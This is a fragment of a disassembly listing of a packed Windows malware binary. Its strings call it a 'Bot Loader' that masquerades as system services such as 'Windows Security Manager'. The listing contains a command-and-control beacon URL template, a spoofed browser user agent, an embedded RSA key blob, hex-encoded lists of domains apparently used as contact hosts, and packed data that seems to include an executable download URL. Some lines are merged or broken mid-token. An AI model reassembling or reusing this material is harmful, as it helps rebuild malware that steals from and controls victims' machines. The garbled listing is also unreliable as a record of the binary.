aSystray db 'SysTray',0 ; DATA XREF: sub_310023C8+2B�o
aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_310023C8+24�o
align 4
aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_310023C8+1D�o
align 4
aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_310023C8+16�o
align 10h
aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_310023C8+F�o
align 4
asc_31004CAC: ; DATA XREF: sub_31002476+56�o
; sub_310026A6+49�o
unicode 0, <\>,0
a1: ; DATA XREF: sub_31002542+B7�o
unicode 0, <1>,0
dword_31004CB4 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31002928+B9�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
aZer0_0 db 'zer0',0 ; DATA XREF: sub_31002A44+BF�o
align 10h
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_31002A44+84�o
align 4
byte_31004D34 db 1 ; DATA XREF: UPX0:31002B45�r
off_31004D35 dd offset dword_31004ED0 ; DATA XREF: UPX0:31002B4D�r
db 1, 0C0h, 4Eh
dd 0B0013100h, 131004Eh, 31004EA0h, 4E8C00h, 4E7C0131h
dd 6C013100h, 31004Eh, 31004E60h, 4E5401h, 4E440131h, 34003100h
dd 131004Eh, 31004E28h, 4E1C01h, 4E100131h, 8013100h, 131004Eh
dd 31004DF8h, 4DE801h, 4DD40131h, 0C4013100h, 131004Dh
dd 31004DBCh, 4DB001h, 4DA40131h, 3100h, 68746566h, 2E647261h
dd 7A6962h, 6B636168h, 2E737265h, 766Ch, 2E767663h, 7572h
dd 2E777777h, 6C646572h, 2E656E69h, 7572h, 69766F6Ch, 646F676Eh
dd 736F682Eh, 6B732E74h, 0
dd 656C6966h, 72616573h, 722E6863h, 75h, 646C6F67h, 61736E65h
dd 722E646Eh, 75h, 6B637566h, 75722Eh, 6F646170h, 2E696B6Eh
dd 67726Fh, 6A6F7274h, 722E6E61h, 75h, 63657361h, 2E616B68h
dd 7572h, 7473616Dh, 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 722E7A61h
dd 75h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dd 72617778h, 6A632E65h, 656E2E62h, 74h
dword_31004ED0 dd 617A616Dh, 616B6166h, 75722EhaMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_310026A6+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_3100281C+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_3100281C+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31002928+B�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_31002A44+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s?scn=%d?inf=%d?ver=13?cnt=%s',0
; DATA XREF: sub_31002A44+57�o
align 4
dd 9 dup(0)
dword_31004FB8 dd 0 ; sub_31001C18+80�w
dword_31004FBC dd 0 ; sub_31002A44+43�r
dword_31004FC0 dd 0 ; sub_31001ADF:loc_31001B8D�r ...
dword_31004FC4 dd 68h ; UPX0:31001DB0�w ...
dword_31004FC8 dd 0 ; sub_31001E06+33�w
dword_31004FCC dd 0 ; sub_310020F4+20�r
dword_31004FD0 dd 31000000h ; UPX0:31001D95�w
dword_31004FD4 dd 0 ; sub_3100202D+53�o ...
dword_31004FD8 dd 0 ; UPX0:310021A3�w
word_31004FDC dw 0 ; DATA XREF: sub_31001F41+3B�r
; sub_31001FA5:loc_31002006�r ...
align 10h
dword_31004FE0 dd 0 ; sub_31002542+110�w
align 20h
UPX0 ends
; Section 2. (virtual address 00005000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00005000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31005000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31005000 dd 0C4h, 40h, 74654701h, 61636F4Ch, 6E49656Ch, 416F66h
; DATA XREF: UPX1:31006AD1�o
dd 69725701h, 69466574h, 100656Ch, 74726956h, 466C6175h
dd 656572h, 72695601h, 6C617574h, 6F6C6C41h, 47010063h
dd 6F4D7465h, 656C7564h, 656C6946h, 656D614Eh, 6C010041h
dd 63727473h, 4169706Dh, 65470100h, 73795374h, 446D6574h
dd 63657269h, 79726F74h, 6C010041h, 63727473h, 417461h
dd 706F4301h, 6C694679h, 1004165h, 456E6957h, 636578h
dd 65724301h, 54657461h, 686C6F6Fh, 33706C65h, 616E5332h
dd 6F687370h, 50010074h, 65636F72h, 32337373h, 73726946h
dd 54010074h, 696D7265h, 6574616Eh, 636F7250h, 737365h
dd 6F725001h, 73736563h, 654E3233h, 1007478h, 7274736Ch
dd 41797063h, 736C0100h, 656C7274h, 100416Eh, 65656C53h
dd 6C010070h, 63727473h, 416E7970h, 65470100h, 72754374h
dd 746E6572h, 636F7250h, 737365h, 74654701h, 636F7250h
dd 72646441h, 737365h, 616F4C01h, 62694C64h, 79726172h
dd 57010041h, 65746972h, 636F7250h, 4D737365h, 726F6D65h
dd 43010079h, 65736F6Ch, 646E6148h, 100656Ch, 6E65704Fh
dd 636F7250h, 737365h, 74654701h, 75646F4Dh, 6148656Ch
dd 656C646Eh, 47010041h, 69547465h, 6F436B63h, 746E75h
dd 65724301h, 4D657461h, 78657475h, 43010041h, 74616572h
dd 72685465h, 646165h, 65724301h, 50657461h, 65636F72h
dd 417373h, 74655301h, 6E657645h, 4F010074h, 456E6570h
dd 746E6576h, 45010041h, 54746978h, 61657268h, 52010064h
dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h
dd 72430100h, 65746165h, 656C6946h, 45010041h, 50746978h
dd 65636F72h, 1007373h, 4C746547h, 45747361h, 726F7272h
dd 65440100h, 6574656Ch, 656C6946h, 57010041h, 46746961h
dd 6953726Fh, 656C676Eh, 656A624Fh, 1007463h, 61657243h
dd 76456574h, 41746E65h, 6E490100h, 6C726574h, 656B636Fh
dd 636E4964h, 656D6572h, 746Eh, 0D1h, 0
dd 67655201h, 61657243h, 654B6574h, 41784579h, 65520100h
dd 74655367h, 756C6156h, 41784565h, 65520100h, 65755167h
dd 61567972h, 4565756Ch, 1004178h, 4F676552h, 4B6E6570h
dd 78457965h, 52010041h, 65446765h, 6574656Ch, 756C6156h
dd 1004165h, 43676552h, 65736F6Ch, 79654Bh, 6F624101h
dd 79537472h, 6D657473h, 74756853h, 6E776F64h, 43010041h
dd 74707972h, 61657243h, 61486574h, 1006873h, 70797243h
dd 73614874h, 74614468h, 43010061h, 74707972h, 69726556h
dd 69537966h, 74616E67h, 41657275h, 72430100h, 44747079h
dd 72747365h, 6148796Fh, 1006873h, 70797243h, 73654474h
dd 796F7274h, 79654Bh, 79724301h, 65527470h, 7361656Ch
dd 6E6F4365h, 74786574h, 72430100h, 41747079h, 69757163h
dd 6F436572h, 7865746Eh, 1004174h, 70797243h, 706D4974h
dd 4B74726Fh, 7965h, 0DEh, 0E8h, 6D656D01h, 706D63h, 72747301h
dd 726863h, 78655F01h, 74706563h, 6E61685Fh, 72656C64h
dd 73010033h, 74737274h, 72010072h, 646E61h, 61727301h
dd 100646Eh, 636D656Dh, 1007970h, 6C727473h, 1006E65h
dd 736D656Dh, 7465h, 0E9h, 110h, 6E694601h, 6E695764h
dd 41776F64h, 65470100h, 726F4674h, 6F726765h, 57646E75h
dd 6F646E69h, 47010077h, 69577465h, 776F646Eh, 65726854h
dd 72506461h, 7365636Fh, 644973h, 70737701h, 746E6972h
dd 4166h, 0F4h, 124h, 746E4901h, 656E7265h, 61655274h
dd 6C694664h, 49010065h, 7265746Eh, 4F74656Eh, 556E6570h
dd 416C72h, 746E4901h, 656E7265h, 65704F74h, 100416Eh
dd 65746E49h, 74656E72h, 736F6C43h, 6E614865h, 656C64h
dd 746E4901h, 656E7265h, 74654774h, 6E6E6F43h, 65746365h
dd 61745364h, 6574h, 100h, 13Ch, 0FF0073FFh, 0DFF0002h
dd 1FF00h, 0FF0039FFh, 34FF006Fh, 17FF00h, 0FF000CFFh
dd 4FF0009h, 13FF00h, 0FF0010FFh, 3FF0016h, 0
dd 45500000h, 14C0000h, 87140002h, 40D0h, 0
dd 0E00000h, 10B010Fh, 24000006h, 10000000h, 0
dd 1D880000h, 10000000h, 40000000h, 0
dd 10003100h, 2000000h, 40000h, 0
dd 40000h, 0
dd 50000000h, 4000000h, 0
dd 20000h, 0
dd 10000010h, 0
dd 10000010h, 0
dd 100000h, 2 dup(0)
dd 2BF00000h, 8C0000h, 14h dup(0)
dd 10000000h, 17C0000h, 6 dup(0)
dd 742E0000h, 747865h, 23060000h, 10000000h, 24000000h
dd 4000000h, 3 dup(0)
dd 200000h, 642EE004h, 617461h, 0FE40000h, 40000000h, 10000000h
dd 28000000h, 3 dup(0)
dd 400000h, 4000C000h, 2DF80000h, 44B60000h, 274D0000h
dd 0F2150DB6h, 0E113C4EBh, 0B2793772h, 68158743h, 68030B84h
dd 166DAC80h, 2D2F8A6Bh, 0F4624753h, 4553EB31h, 9A17BC76h
dd 8B3E3423h, 3038C8C2h, 0E1FB5701h, 58E73ED9h, 3604D0C9h
dd 294BA468h, 0A95D0DEEh, 6806D1DBh, 1D89805Bh, 44B09FBCh
dd 122776DBh, 0B314DF60h, 0B05DF2C7h, 5614DDADh, 27B5353h
dd 80113A01h, 0D1FC735h, 0F029C804h, 1A40FE83h, 9A51B3ECh
dd 0C4C02274h, 4C46C0A3h, 16FDE978h, 0F1A3597Ch, 5153FC97h
dd 674B6249h, 0C03A796Bh, 0E126565Bh, 0EC3370FBh, 0C2580C5Eh
dd 499AF810h, 0B35E69A8h, 0E80C3E56h, 5E93BFB7h, 0EC5D89h
dd 0FF25FF05h, 0C33A041Fh, 0DD837FA1h, 7443CCA3h, 0CC8A12E7h
dd 0DF74C984h, 0A3645E50h, 42EA26F4h, 154098F5h, 58C2DD32h
dd 6E440C64h, 0F4D7D1FDh, 0D807F85Fh, 6891481Fh, 38501ADFh
dd 0AF0867FBh, 0E2EB5959h, 455FCF53h, 97305987h, 70019043h
dd 0EB36D0A1h, 0B0333C5Eh, 23E11D6h, 0F4C1E60Ah, 802DD6D9h
dd 304526A0h, 0A3541B63h, 7CD4E0D0h, 603B19B0h, 1AC4A36Eh
dd 0D9B73DD0h, 52C13B3Dh, 729CC45h, 0C41304C5h, 0BEC71C95h
dd 6683E15h, 4D08131Eh, 0FD8D26A5h, 0B5FAEDAh, 6999020Eh
dd 0D844C835h, 5834F0BBh, 6A26402Ch, 7F1180A1h, 0B2EAFF7Ah
dd 0A1642BD0h, 8964508Ah, 0B36C0725h, 68C3C772h, 388F9758h
dd 0AD816CDCh, 843A3D7h, 674BA8FCh, 7F603203h, 4C7AB0Ah
dd 400B4824h, 9A40643Ch, 38860927h, 40643D34h, 592C3006h
dd 0F07CC339h, 3974080Bh, 2C4B2468h, 60F7C590h, 4B1CB632h
dd 0DEE1406h, 498485DBh, 0D0A280Ch, 0E49CBB58h, 1C187676h
dd 400A9515h, 3521502Bh, 0C382267Ch, 14EDEE28h, 0D0FA43E3h
dd 888618DDh, 0E3EB2A13h, 81618683h, 3DFF61B2h, 0F0BA3C0Fh
dd 48204615h, 0E4270D67h, 47C2A80h, 2E7FA4D8h, 0B458A51h
dd 0B0E1E92Dh, 32FFEB97h, 43A52DBh, 1CEFC895h, 3831BA5Fh
dd 8825BA5Dh, 13FA0B5Dh, 0B70F5E02h, 0DD19FECFh, 59A4DC35h
dd 0FEF7999Dh, 7352D603h, 0B2EDC3FEh, 0FB80FC65h, 5EBD72FFh
dd 5F766248h, 49ACEC99h, 6833F092h, 15B0D758h, 81084F0Eh
dd 5DD40D0Ah, 36D99863h, 0E0530B09h, 92D90E75h, 0F75B771h
dd 1F41680Ch, 0E93D89BAh, 32DADE41h, 0D703FF84h, 0B1FB8143h
dd 50DBE4C6h, 875F9F17h, 9A030C5Dh, 737BB166h, 6FB3A2E8h
dd 1DEF025Bh, 0FD73812Fh, 2DE6BD04h, 77FEFF9Eh, 0F7887F3Ch
dd 62DB0E9Eh, 3B3123A3h, 3EAADC74h, 0C59D93B0h, 9E57A0A3h
dd 0C89C572Fh, 57112CF6h, 0A51359F8h, 712B712Fh, 75B33CFFh
dd 106873EEh, 64761E27h, 0BED3A60Dh, 70849ED3h, 60CB2C2h
dd 4EDEA9AEh, 60E5AC60h, 508F5099h, 316D7A70h, 8078BA5Ah
dd 0CF6F81DAh, 0BCCBB3Ch, 6068B003h, 35EABC4Bh, 111001B9h
dd 266C40B5h, 8AC077D3h, 0DF0B80C6h, 0B3BC2CC7h, 5655C2C0h
dd 0D4125793h, 63C343E6h, 0A5519402h, 0EC181F0Ch, 0F4FD30E0h
dd 0E25314E3h, 3776CD5Bh, 6A020BF6h, 5DD83850h, 0E87105BAh
dd 96D27FB5h, 9187400h, 0E13B8211h, 510AE60h, 4F001419h
dd 7E1006D8h, 0F010B0A2h, 0D743EAAh, 0C420D553h, 51C73B62h
dd 0DB399210h, 4C3C37D0h, 0ED3A1824h, 117EED85h, 2C202D26h
dd 0EDB0EEDh, 96EF144Dh, 0F2EBA205h, 8324B716h, 0EB65750Dh
dd 4C0B7BDDh, 3F680E94h, 11179C0Dh, 0C06460Bh, 2C382A15h
dd 106EB3BEh, 51B01408h, 17470B65h, 7D5618B7h, 0B8C618B8h
dd 3EF6B1B0h, 0DC743D56h, 676E962Ah, 18FC7516h, 10205014h
dd 3C6B1718h, 6A030859h, 5A550F1Dh, 8BE2CED7h, 4D5662C6h
dd 182C562Eh, 53CEC990h, 27005556h, 2C5ACE59h, 0C520AA6h
dd 9262CF04h, 305D0C03h, 83EA0128h, 0DE5320C3h, 0EDE24EAFh
dd 0F1B5E0Fh, 3CC2948Eh, 4E365C1Eh, 17ADF779h, 6785F07Ch
dd 0C1A4AEE4h, 7ADE2592h, 0D8DB3568h, 0ECEC5F49h, 5C71082h
dd 0C0865020h, 1BEEF134h, 8D477DDEh, 0FC1D1E74h, 0F178BFEFh
dd 745278DEh, 0E0B5FF1Ch, 0F20B9B45h, 0FFFC646h, 7008521Fh
dd 33361C35h, 76D84650h, 39E17BBDh, 38B78973h, 57D00F56h
dd 239103C7h, 4C9076B7h, 7CD4062Ch, 723964D8h, 58DCC8E4h
dd 44E450E0h, 47942CE8h, 20EC1C8Eh, 0F4F404F0h, 69A2794Bh
dd 0A7DB032h, 16BEEBBFh, 80C4C2C7h, 0B7188B05h, 0C8A34497h
dd 75F92EC8h, 0B06C107Dh, 1D2B0E17h, 9A2C0C90h, 8337354Ch
dd 5F75B61Dh, 519C0761h, 74E4781Bh, 0EE98AD09h, 0D3D41887h
dd 0E5636A88h, 9C09FE58h, 0A184435Dh, 3E0831Bh, 8705C083h
dd 0D109D365h, 5CD00952h, 86EEC2Ch, 8C1059B9h, 4CAC683Dh
dd 0E661C30Ah, 140E26DCh, 0CEF1E138h, 6160D982h, 0CC20401Ch
dd 0C8662CB7h, 30B9C6C6h, 0ACC59Bh, 125D4160h, 64146CFAh
dd 73F01F4h, 20E7B7CCh, 0E8795E34h, 7CF45700h, 9F60C1FFh
dd 501FC52Bh, 0BFB14C7h, 25D376E0h, 0E02D52E0h, 0BF501D6Ah
dd 207A71CCh, 51F0E10Ch, 0FE37743Fh, 0AB907B94h, 1FB4BB0Ah
dd 52D103B0h, 0B61D8B53h, 53EEF4C5h, 383D53BCh, 37EE6BC6h
dd 590FEBB1h, 0D82532CEh, 78C8D9B2h, 65E28818h, 1C6F7596h
dd 0B068BB26h, 46E8184Ch, 0CDC2372Eh, 14FEB9BBh, 915EEB72h
dd 12C166A7h, 3310AB4Ch, 31B1BC24h, 0FD3BBBC6h, 90462D2Ch
dd 7E0AE2Dh, 2D8D5948h, 15EB0CE4h, 9AF55960h, 93806472h
dd 0EC0CD7CBh, 331EA783h, 7668CA4Ch, 0C674136Ah, 48115B38h
dd 7BE010DDh, 57EFD4C9h, 0DC68CAE5h, 1B2CEC4Eh, 0BC7EA41Dh
dd 0C0DE3BD8h, 0F0A86317h, 248CF1ECh, 2C3D8B4Bh, 9D9E3017h
dd 0DD72211h, 710E066Ah, 8D7BC676h, 5C0F0584h, 0D1591C59h
dd 598375ACh, 3026DD7h, 62B30114h, 0A740C5F2h, 0F00C3AD9h
dd 0C8152080h, 1E289053h, 3BB5D827h, 0E7511C6h, 0A8C544A3h
dd 517D03BBh, 57E800BFh, 780D1FDDh, 4859B0B4h, 9924FB53h
dd 119F1DB1h, 0F8A756F4h, 2D443353h, 3C92C1BDh, 8A9C05AAh
dd 5C938153h, 0EB9040F1h, 0C6D08B49h, 8702C77h, 7C04E78Bh
dd 40FFCF83h, 7FF0086Ah, 171FFE3h, 8A59F92Bh, 0FF588A10h
dd 0C1D90239h, 0E28004FAh, 0DD542A03h, 0F62FEDFEh, 0A02E3C0h
dd 8AA588D3h, 188A0150h, 221ACAFEh, 6D6EEFD1h, 35716E9h
dd 0F0E32319h, 4646161Ch, 30EE08Dh, 833714FEh, 0BF7C30FAh
dd 0ED593817h, 27BC4FB7h, 122CBE59h, 0F30AE47Dh, 0A4A566A5h
dd 816FF40Fh, 25C81091h, 0DB85100Ch, 2D237DA4h, 0C3A2BE95h
dd 0D3BE0F1Ah, 0E438EC9Ch, 804D5AA5h, 0C8AF2357h, 6FF1BFB6h
dd 0C12B1A38h, 99C30359h, 15448AD0h, 1F23EBE4h, 0E427C2C8h
dd 0EBC8C840h, 83418A03h, 2AAC301Ah, 6EA50786h, 57107E37h
dd 0BA84008Ah, 53618B4Ch, 46A1422Ch, 8A136E05h, 4FBEB1D8h
dd 6041FD0Bh, 18180C08h, 47590788h, 0F6DF6138h, 7C59EDEDh
dd 7F7A050Bh, 83F38C06h, 410A61EEh, 0FED75A0Fh, 4D4120DCh
dd 5BBB7548h, 382A4B64h, 418045A8h, 0FF0B4EA5h, 8B0AB617h
dd 0B60F040Eh, 0C2031114h, 3F98341h, 8E1633F0h, 0C28B3004h
dd 25816122h, 3C994D70h, 0EDFA480Ah, 942301EDh, 0FCF4C001h
dd 0D968D6C9h, 0E90DFF80h, 0D008C183h, 0E0D038F1h, 50285D83h
dd 6CCDE257h, 780D03Ch, 22A6A780h, 0E3BB9BE6h, 0F2261E8h
dd 1E0BBA88h, 0B18D0F1Ah, 0EEBE59ABh, 317E6A47h, 0F6F04DECh
dd 0E982569Bh, 1E8AF760h
dd 5B268065h, 0B2F34C4h, 9DEABEA5h, 8DC4408Ah, 0FA6F0246h
dd 1E88DFB9h, 0FBC1711h, 0BA041908h, 5B014638h, 0F1CB6811h
dd 446A6175h, 1E4C1456h, 0CE15DD98h, 282D8C01h, 4D50306Ah
dd 0C161B98Dh, 2A2F0DFFh, 2753D8F7h, 7DD0124Ch, 330F1B10h
dd 0A27823F5h, 0DB24F159h, 0E042D059h, 5901E805h, 14F00885h
dd 8512C200h, 3B443D18h, 9117076Ah, 566B140h, 3438C6EBh
dd 1A0C3274h, 599B32Ch, 0D405BC72h, 0DA12D7C6h, 4F5CA0D1h
dd 4AC08E79h, 13185CCDh, 0DD19BA2Dh, 0CF736B0h, 4D5F0053h
dd 38D0D0Eh, 8DBF864Eh, 50515326h, 204A9264h, 0BEFB6575h
dd 51A22000h, 0AC750C14h, 4EB40B8h, 0F8227F3Bh, 0D5B1354Ch
dd 4BD26E05h, 7C4E4352h, 0BD3E8D48h, 0DF0309A1h, 7924196Ch
dd 0BA0F8773h, 3230D68Dh, 0F6D64C59h, 8C5725FBh, 348F9ED6h
dd 34B6848Ah, 5269914Dh, 0B6B4FD8Fh, 1A4B4D35h, 0FBD65940h
dd 808A11FCh, 33C54EC4h, 93E0B9D2h, 2FFA9070h, 81F1F708h
dd 61B48C2h, 0FE836800h, 2FF73646h, 0B6EBBA0Eh, 825FFCCh
dd 40561h, 6E09E9BDh, 0EA51CCCCh, 1472E58Dh, 7A5BE981h
dd 2D0BF7ECh, 17018504h, 812BEC73h, 6ECF0CC4h, 0E18B7A5Bh
dd 0CA40768Bh, 10F043C3h, 2322A5E8h, 6C740563h, 8501502Bh
dd 4F7Dh, 0B00A8A3Fh, 6858EB01h, 0CDFFEC74h, 3A7074FFh
dd 32312F2Fh, 31302E37h, 3030383Ah, 652E652Fh, 0DF6578h
dd 8FFEDFFFh, 697A6F4Dh, 2F616C6Ch, 5DDF2734h, 0B966C933h
dd 758D01EEh, 0FFFD8B05h, 8AFEFB6Dh, 7993C06h, 302C0646h
dd 88993446h, 0EDE24707h, 0DAE80AEBh, 2FFDFFBh, 65622E82h
dd 93712E67h, 1201C999h, 0FD91BDFDh, 0BFDD0716h, 72C17FFFh
dd 0FD42AA68h, 10FDAA66h, 0A91C14BAh, 0F3C91A98h, 8608F198h
dd 6EC7FECFh, 10C07102h, 37CB5F90h, 1C965992h, 0E4143A78h
dd 0EC3E4FB6h, 0A7D7157h, 0F345713Ah, 8904F19Dh, 0FBEE748Fh
dd 9C04F109h, 67B34011h, 0B7BFE3F3h, 10F0F63Bh, 0B20BDC1Ch
dd 0C99B6059h, 14D90125h, 0D8F63E59h, 0CA17A104h, 8D2B9E71h
dd 0AD916168h, 1FD9F6B7h, 9666611Ah, 0B228111Dh, 9900C850h
dd 0F6EFDC14h, 5557B6CFh, 0A44E1225h, 491291C0h, 54F7ED99h
dd 6FF67EEEh, 3AC41400h, 3B71CBCAh, 0E424FF1Ch, 0CDCF1A21h
dd 0D9B64FCDh, 2C668FC3h, 0FB1E3F81h, 0DB37CEB0h, 0C383B8FDh
dd 0A85D12CDh, 251DCBC9h, 3FB264ADh, 5A0B24D9h, 0C096A648h
dd 0D9FB1B14h, 294CFF65h, 9CF3EBA7h, 3416E9BAh, 0F57126F4h
dd 0ECFFFBBBh, 3BF90EFCh, 4629EF13h, 0DE5F376Bh, 0A8EC4766h
dd 0F7B016AAh, 0B70137FFh, 0E9EDFFC5h, 0B7FDE9ECh, 12CE1FCh
dd 87DDFEDFh, 0FCFCF5CAh, 0EBFCF25Ah, 0AAF5FCF7h, 34C7D6ABh
dd 0FFB3AAF9h, 0B459FFF2h, 662A2A25h, 9093ACC9h, 9D90B781h
dd 0CDC98363h, 10309271h, 0BFF85F76h, 14513519h, 720A95D9h
dd 0C8712A91h, 0FFFDBFEBh, 12A5D27Fh, 9AE180D5h, 146FAA52h
dd 0C89A2A8Dh, 9A8B12B9h, 5958474Ah, 0DB9BAB9Eh, 0DBEDFFFFh
dd 0EC20A319h, 0BDDDA26Ch, 0DF9EED85h, 0EB81E8A2h, 0C8125544h
dd 0B0961FBDh, 2EFFFCD0h, 0D812EB8Dh, 125A9A85h, 5A9A099Dh
dd 0D096F810h, 9FFBB6F6h, 7F664922h, 8712FEFDh, 95C25AA9h
dd 82128502h, 0B5483F04h, 0CB5A91EDh, 85C7CFF7h, 424D53FFh
dd 9F90BC8Fh, 0C8531872h, 62FEFFh, 0FFF1AD02h, 204350FFh
dd 5754454Eh, 204B524Fh, 474F5250h, 204D4152h, 0FB17CD31h
dd 4CF6B1FFh, 24D4E41h, 6E69570Ah, 73776F64h, 726F6620h
dd 0D6035720h, 6B7F6D2Dh, 756F7267h, 1A330E70h, 234D2761h
dd 0E96C3E5Eh, 32215832h, 312E3232h, 7920544Eh, 18DA6B06h
dd 8B323C20h, 44BB73A4h, 0BA07192Bh, 23FF0Ch, 7D8363h
dd 140A1104h, 1FD40520h, 0D6ED6F5h, 4B4C0069h, 27505353h
dd 0CA76FF97h, 0E00882EAh, 24005792h, 64006Eh, 0B777006Fh
dd 0DCDB17h, 30743A73h, 398C0901h, 25B73000h, 1D2335B2h
dd 0C800072Eh, 0DA1B2273h, 0DA2008ABh, 0C9324CDh, 1039F57h
dd 758360C8h, 47234601h, 73FF4007h, 60F23h, 1F011006h
dd 0E0888A15h, 0E8B70048h, 4FE5FFh, 6A198144h, 49E4F27Ah
dd 30AF281Ch, 215367B3h, 0E16044DFh, 6B75DF5Ch, 304F2DAEh
dd 75C0400h, 8D085ABDh, 5CAF75DCh, 72E4D61h, 2E380036h
dd 8DDB7BAFh, 491B3077h, 43EC00h, 3F3B24h, 61CF201Fh, 8A26463h
dd 0E41E04DCh, 16402DBFh, 0DEDE00FFh, 16000E00h, 3702019Fh
dd 26C24261h, 0DE192840h, 3EFB868h, 0D96C8B11h, 70D374h
dd 0BE429663h, 6B9C2ACBh, 81DD9F25h, 0E10DB3Dh, 541B0448h
dd 0DCFB5413h, 265A75D6h, 5C225963h, 6545CBC7h, 9FF3483Dh
dd 0B000587h, 0B8481003h, 0FFFEB810h, 0B0EEC5Fh, 19286A05h
dd 0D0B10C39h, 0A89B11h, 2ED94FC0h, 0FE17D9F5h, 885D5FC7h
dd 0C91CEB8Ah, 3CE89F11h, 6048102Bh, 22E7C9D1h, 0A3F40C7Bh
dd 30CA060h, 0A05E43C8h, 0CB10Ch, 2393BFEFh, 40880CA0h
dd 0EC000900h, 47B00703h, 95009278h, 7C4F4014h, 0C8BF4070h
dd 6C8A5Eh, 9E134307h, 788FFC27h, 0AB001385h, 13E9A65Bh
dd 8D2FF810h, 0FF409CF1h, 40230EFEh, 41830C1Dh, 88840816h
dd 27DD3E4Fh, 0EE10B943h, 10B801FFh, 661F200Ch, 0DAD2793h
dd 0D80F7F07h, 215E59F2h, 84700118h, 90F9000Fh, 950F8457h
dd 0E4D8000Fh, 7F026FC9h, 0F6C0F84h, 4AADEC00h, 6FA89A78h
dd 93FC1343h, 691F88C0h, 2050586Eh, 6DB37250h, 4600AC0Ah
dd 93390144h, 32C844FCh, 15123C6Bh, 0B2410275h, 53C840D7h
dd 1941C00h, 21CAFFF9h, 5CC606EBh, 5C73255Ch, 24637069h
dd 0BFFF97F9h, 1CEC8166h, 0E4FF07h, 65446553h, 69677562h
dd 656C6976h, 266D6567h, 6441FFFBh, 7473756Ah, 656B6F54h
dd 4C73176Eh, 27F76F6Fh, 707512B9h, 756C6156h, 4F174165h
dd 0FFE02870h, 636FDB62h, 43347324h, 61766461h, 68336970h
dd 0E3C7F88Bh, 72657475h, 5B33316Dh, 0C4AEF665h, 545F11DFh
dd 57796172h, 72431735h, 0ED1A6165h, 52FB773Bh, 56F6D65h
dd 140C6854h, 74726956h, 5BB55875h, 2841B5BBh, 0F78454Fh
dd 356E724Eh, 9E97D1A2h, 1EF3F547h, 50545448h, 4BF7BF7Fh
dd 32203C5Ch, 4B4F2057h, 4B010A0Dh, 0FF666E6Fh, 2446B76h
dd 67044C2Dh, 203A6874h, 5A187525h, 2FCA587Bh, 0B5795428h
dd 6DBD1D26h, 6C70A3DFh, 69856369h, 2D782F15h, 28F42DC7h
dd 6F63FBB6h, 0C972706Dh, 0DB576465h, 7FCADBDDh, 544547FCh
dd 64FE6600h, 6573D311h, 952BFDA1h, 6376736Dh, 0F177D3B1h
dd 16DA2DDh, 320B0865h, 0EB75175Fh, 0DE336696h, 39303103h
dd 9013380Fh, 0D1173E41h, 17303107h, 33645482h, 253AA45Dh
dd 0B59FFF2Fh, 53678D64h, 5754464Fh, 5C455241h, 736F694Dh
dd 583F756Fh, 735C836Ch, 7275435Ch, 0C356C972h, 88B770E2h
dd 525CBE73h, 0FE907875h, 55B430DFh, 64135BA8h, 68736166h
dd 73647A6Eh, 0DAC26C64h, 4953426Eh, 573F6177h, 5B7050AEh
dd 4BF96C0Eh, 25865712h, 49236C4Ch, 3120B16Dh, 0FB43DDDEh
dd 20676966h, 76D7A576h, 326576F8h, 736C979Dh, 532063CFh
dd 1B654410h, 165B991Ah, 172387B2h, 1F858D12h, 737983BFh
dd 0FF42000Ch, 2DC65B20h, 23FD0AD6h, 206D1B13h, 0AC07A14h
dd 374E06B5h, 7B736944h, 3251B6EEh, 672F66AAh, 632A9C6Dh
dd 25B0BFDAh
dd 690A6324h, 4D207974h, 0A71E6E61h, 1AC56317h, 70483185h
dd 1DF8B3FFh, 415352F0h, 78018031h, 11838DF5h, 2AEC5279h
dd 56FFFFFFh, 49E7F61Ch, 0BEE0EA9Bh, 7EDB21AFh, 5E1A9544h
dd 85A03261h, 949F6A1Fh, 0FFFF68B1h, 843994FFh, 358F26A6h
dd 0A55C1DCEh, 7AB20BC9h, 8F1D2252h, 20D25603h, 62372728h
dd 0B6FDAD6h, 53773B31h, 36204549h, 0E8920915h, 0E41A1A36h
dd 6F297435h, 77CF76D0h, 0C0017A83h, 0EA0B004h, 9E798C00h
dd 6C7C79E7h, 0E7445460h, 34E7BE79h, 101C0428h, 3CF3CF08h
dd 0E84DF8CDh, 0B0BCC4D4h, 3CC986C2h, 6883D7A4h, 0F6D37AD6h
dd 6962A48Dh, 6308007Ah, 6C2E733Eh, 9AD68D76h, 766343DFh
dd 77722E76h, 2ADB0700h, 6C8E6294h, 5F660FACh, 5B6370AFh
